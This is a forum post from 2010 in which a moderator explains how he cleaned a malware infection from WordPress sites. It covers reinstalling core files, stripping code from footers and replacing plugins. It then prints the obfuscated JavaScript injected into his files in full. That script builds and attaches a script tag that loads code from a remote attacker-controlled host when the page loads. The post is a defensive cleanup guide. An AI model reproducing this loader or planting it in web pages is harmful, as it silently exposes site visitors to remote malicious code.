View Single Post
Old 03-05-2010, 01:16 PM   #17
bgbennyboy
Festively Plump
 
bgbennyboy's Avatar
 
Status: Super Moderator
Join Date: Feb 2002
Location: England
Posts: 1,984
LFN Staff Member 
For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:
  • Delete the wp-admin and wp-includes folders
  • Download wordpress again and reupload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.

This is the code that was appended to my files:
Code:
<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

bgbennyboy is offline   you may: quote & reply,